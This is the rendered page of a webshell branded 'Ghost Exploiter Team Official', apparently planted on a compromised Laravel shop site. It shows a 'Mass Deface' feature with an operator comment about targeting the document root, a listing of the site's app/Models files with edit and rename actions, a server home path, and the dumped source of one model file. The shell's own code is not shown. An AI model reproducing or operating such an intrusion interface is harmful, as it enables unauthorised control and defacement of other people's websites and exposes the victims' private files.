webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
app
/
Models
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
473035
--
ren
Admin.php
0.947KB
edt
ren
Attribute.php
0.316KB
edt
ren
AttributeOption.php
0.318KB
edt
ren
Bcategory.php
0.289KB
edt
ren
Brand.php
0.293KB
edt
ren
CampaignItem.php
0.287KB
edt
ren
Category.php
0.44KB
edt
ren
ChieldCategory.php
0.575KB
edt
ren
Currency.php
0.198KB
edt
ren
EmailTemplate.php
0.191KB
edt
ren
ExtraSetting.php
1.374KB
edt
ren
Faq.php
0.299KB
edt
ren
Fcategory.php
0.334KB
edt
ren
Feature.php
0.175KB
edt
ren
Gallery.php
0.178KB
edt
ren
HomeCutomize.php
0.384KB
edt
ren
Item.php
3.055KB
edt
ren
Language.php
0.211KB
edt
ren
Message.php
0.254KB
edt
ren
Notification.php
0.648KB
edt
ren
Order.php
1.089KB
edt
ren
Page.php
0.225KB
edt
ren
PaymentSetting.php
0.335KB
edt
ren
Post.php
0.326KB
edt
ren
PromoCode.php
0.224KB
edt
ren
Review.php
0.606KB
edt
ren
Role.php
0.143KB
edt
ren
Service.php
0.186KB
edt
ren
Setting.php
3.059KB
edt
ren
ShippingService.php
0.224KB
edt
ren
Sitemap.php
0.186KB
edt
ren
Slider.php
0.212KB
edt
ren
Social.php
0.173KB
edt
ren
SocialProvider.php
0.269KB
edt
ren
State.php
0.192KB
edt
ren
Subcategory.php
0.549KB
edt
ren
Subscriber.php
0.171KB
edt
ren
Tax.php
0.184KB
edt
ren
Ticket.php
0.485KB
edt
ren
TrackOrder.php
0.306KB
edt
ren
Transaction.php
0.425KB
edt
ren
User.php
1.791KB
edt
ren
Wishlist.php
0.524KB
edt
ren
index.php
0KB
edt
ren
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; class Notification extends Model { protected $fillable = ['order_id','user_id']; public function order() { return $this->belongsTo('App\Models\Order')->withDefault(); } public function user() { return $this->belongsTo('App\Models\User')->withDefault(); } public static function countRegistration() { return Notification::where('user_id','!=',null)->where('is_read','=',0)->count(); } public static function countOrder() { return Notification::where('order_id','!=',null)->where('is_read','=',0)->count(); } }